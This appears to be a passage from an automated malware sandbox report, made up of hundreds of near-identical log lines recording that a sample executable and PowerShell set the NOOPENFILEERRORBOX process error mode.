              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
